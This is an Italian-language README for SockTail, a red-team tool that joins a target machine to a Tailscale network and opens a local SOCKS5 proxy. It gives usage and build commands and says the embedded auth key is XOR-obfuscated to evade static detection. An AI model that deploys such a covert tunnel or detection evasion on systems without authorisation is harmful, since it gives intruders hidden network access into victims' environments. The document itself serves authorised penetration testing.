
Binario Go leggero che collega un dispositivo a una rete Tailscale ed espone un proxy SOCKS5 locale per un accesso red team effimero. Supporta chiavi di autenticazione offuscate con XOR, server di controllo personalizzati e persistenza zero.
SockTail è un piccolo binario che collega un dispositivo a una rete Tailscale ed espone un proxy SOCKS5 locale sulla porta 1080. È pensato per operazioni red team in cui hai bisogno di accesso di rete a un sistema target senza dover configurare complicati inoltri di porta, demoni persistenti o tunnel rumorosi.
1080 tramite Tailscaletsnet, nessuna dipendenza esternaNon è pensato per la persistenza. È un dropper SOCKS monouso per operazioni red team.
Credito immagine: "The SOCKS We Have at Home" di TrustedSec — grazie per i meme.
Utilizzo: ./SockTail [hostname] [authkey] [control-url]
hostname: Opzionale. Generato automaticamente se non specificato
authkey: Opzionale. Usa la chiave incorporata se non specificata
control-url: Opzionale. Usa il default Tailscale o l'URL impostato in fase di build se non specificato
port: Fissa su 1080
Esempi:
./SockTail
- Hostname automatico, chiave incorporata, server di controllo predefinito
./SockTail vpn-srv-01
- Hostname personalizzato, chiave incorporata, server di controllo predefinito
./SockTail shellbox-7 tskey-auth-1fXXXXXXXXXXXXXXXXXXXXXXXXXX
- Hostname personalizzato e chiave di autenticazione a runtime, server di controllo predefinito
./SockTail my-proxy tskey-auth-1fXXXXXXXXXXXXXXXXXXXXXXXXXX https://headscale.example.com
- Tutto personalizzato: hostname, chiave di autenticazione e server di controllo (es. Headscale)
tsnet.Server usando la chiave di autenticazione Tailscale fornita (o incorporata) e l'hostname.localhost:1080.tsnet.Dial.Non c'è persistenza. Una volta che il binario termina, la connessione alla tua Tailnet viene interrotta.
Il progetto include un offuscamento basato su XOR per l'AuthKey al fine di eludere i rilevamenti statici. Puoi incorporare la tua chiave di autenticazione in fase di build usando i flag del compilatore: nessuna modifica manuale richiesta!
var xorKey = []byte("747sg^8N0$")
La chiave verrà offuscata tramite XOR e incorporata automaticamente durante il processo di build se nessuna chiave viene passata da riga di comando.
Scritto in Go, nessuna dipendenza esterna:
# Build con chiave di fallback incorporata
make build
# Build con la tua chiave di autenticazione personalizzata (consigliato)
make build-with-key AUTH_KEY=tskey-auth-client-xxxxx-your-key
# Build con chiave di autenticazione personalizzata e server di controllo (per Headscale, ecc.)
make build-with-config AUTH_KEY=tskey-auth-client-xxxxx-your-key CONTROL_URL=https://headscale.example.com
# Build per tutte le piattaforme con la tua chiave
make build-all-with-key AUTH_KEY=tskey-auth-client-xxxxx-your-key
# Build per tutte le piattaforme con server di controllo personalizzato
make build-all-with-config AUTH_KEY=tskey-auth-client-xxxxx-your-key CONTROL_URL=https://headscale.example.com
Il sistema di build offusca automaticamente tramite XOR la tua chiave di autenticazione e incorpora sia la chiave che l'URL di controllo in fase di compilazione: nessuna modifica manuale del sorgente richiesta!
Server di controllo personalizzati: Perfetti per soluzioni Tailscale self-hosted come Headscale. Basta specificare l'URL del tuo server di controllo e la chiave di autenticazione appropriata per quella istanza.